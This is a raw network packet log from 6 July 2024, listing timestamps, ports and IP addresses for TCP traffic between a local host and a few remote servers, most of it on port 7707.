Jul 6, 2024 13:28:07.364775896 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.364787102 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.364797115 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.364809990 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.364840031 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.364840031 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.364916086 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.364936113 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.365011930 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.365024090 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.365035057 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.365045071 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.365073919 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.365109921 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.365109921 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.365195036 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.365206957 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.365221977 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.365232944 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.365251064 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.365317106 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.365353107 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.365412951 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.365422964 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.365428925 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.365516901 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.365528107 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.365546942 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.365626097 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.365631104 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.365638018 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.365653038 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.365664005 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.365674019 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.365704060 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.365773916 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.365899086 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.367777109 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.367837906 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.367950916 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.406080961 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.411415100 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.411497116 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.416531086 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.460964918 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:07.461108923 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:07.542387962 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:07.542412996 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:07.544879913 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:07.544991970 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:07.546627045 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:07.588515997 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:07.822437048 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:07.822479010 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:07.822495937 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:07.822511911 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:07.822523117 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:07.822531939 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:07.822563887 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:07.822577000 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:07.822613955 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:07.822746038 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:07.822797060 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:07.822884083 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:07.822932005 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:07.822938919 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:07.823033094 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:07.846051931 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.846683979 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.846743107 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.846750021 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.846762896 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.846805096 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.847070932 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.847081900 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.847095013 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.847105980 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.847124100 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.847151995 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.847160101 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.847178936 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.847229004 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.847230911 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.847243071 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.847254992 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.847296953 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.847389936 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.847409010 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.847419024 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.847434044 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.847461939 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.847538948 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.847549915 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.847560883 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.847573042 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.847584963 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.847594023 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.847600937 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.847608089 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.847650051 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.847810984 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.847822905 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.847834110 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.847861052 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.847934961 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.847945929 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.847956896 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.847969055 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.847985983 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.848025084 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.848077059 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.848088980 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.848098993 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.848130941 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.848156929 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.848164082 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.848181963 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.848193884 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.848206043 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.848218918 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.848232031 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.848233938 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.848244905 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.848262072 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.848283052 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.848493099 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.848531008 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.848566055 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.848577023 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.848586082 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.848609924 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.848648071 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.848656893 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.848699093 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.851588011 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.851634979 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.851645947 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.852910042 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.852935076 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.852948904 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.852953911 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.852997065 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.853032112 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.853081942 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.853091955 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.853102922 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.853116989 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.853148937 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.853245974 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.853257895 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.853270054 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.853281975 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.853287935 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.853295088 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.853306055 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.853327036 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.853343010 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.853370905 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.853482008 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.853493929 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.853504896 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.853518009 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.853524923 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.853530884 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.853552103 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.853576899 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.853593111 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.853643894 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.853656054 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.853688955 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.853733063 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.853744030 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.853754044 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.853776932 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.853806973 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.934775114 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.934787989 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.934798956 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.934845924 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.934887886 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.934899092 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.934907913 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.934920073 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.934931040 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.934956074 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.935051918 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.935062885 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.935071945 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.935092926 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.935117006 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.935144901 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.935157061 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.935165882 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.935177088 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.935204029 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.935225964 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.935400009 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.935414076 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.935425043 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.935435057 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.935446024 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.935451984 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.935456991 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.935468912 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.935475111 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.935488939 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.935497046 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.935530901 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.935679913 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.935692072 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.935725927 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.935762882 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.935775995 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.935787916 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.935812950 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.935949087 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.935961962 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.935971975 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.935983896 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.935995102 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.936002016 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.936013937 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.936014891 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.936026096 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.936043978 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.936064005 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.936254978 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.936266899 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.936276913 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.936288118 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.936300039 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.936311960 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.936322927 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.936323881 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.936336040 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.936357021 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.936379910 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.937720060 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.937731028 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.937788963 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.939733028 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.939773083 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.939785957 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.939812899 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.939896107 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.939954042 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.940275908 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.940325022 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.940337896 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.940361977 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.940402031 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.940418959 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.940433025 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.940443993 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.940448046 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.940473080 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.940608978 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.940622091 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.940633059 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.940646887 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.940649986 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.940660000 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.940674067 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.940682888 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.940685987 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.940712929 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.940726042 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.940737009 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.940804958 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.940818071 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.940829992 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.940849066 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.940875053 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.941190958 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.941297054 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.941308022 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.941319942 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.941332102 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.941338062 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.941365004 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.978204012 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:07.978249073 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:07.978261948 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:07.978274107 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:07.978291035 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:07.978324890 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:07.978456974 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:07.978494883 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:07.978501081 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:07.978533983 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:07.978820086 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:07.978868008 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:07.978878021 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:07.978914976 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:07.979020119 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:07.979058027 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:07.979065895 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:07.979100943 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:07.979657888 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:07.979701042 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:07.979728937 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:07.979769945 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:07.979774952 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:07.979805946 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:07.979820967 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:07.979862928 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:07.980499983 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:07.980534077 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:07.980540037 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:07.980573893 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:07.980581999 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:07.980622053 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:07.980648994 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:07.980691910 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:07.980699062 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:07.980742931 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:07.981373072 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:07.981425047 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.007846117 CEST	80	49821	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:08.007880926 CEST	80	49821	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:08.007927895 CEST	49821	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:08.012345076 CEST	49821	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:08.049397945 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:08.068062067 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.068114042 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.068114042 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.068125010 CEST	443	49822	188.114.97.3	192.168.2.4
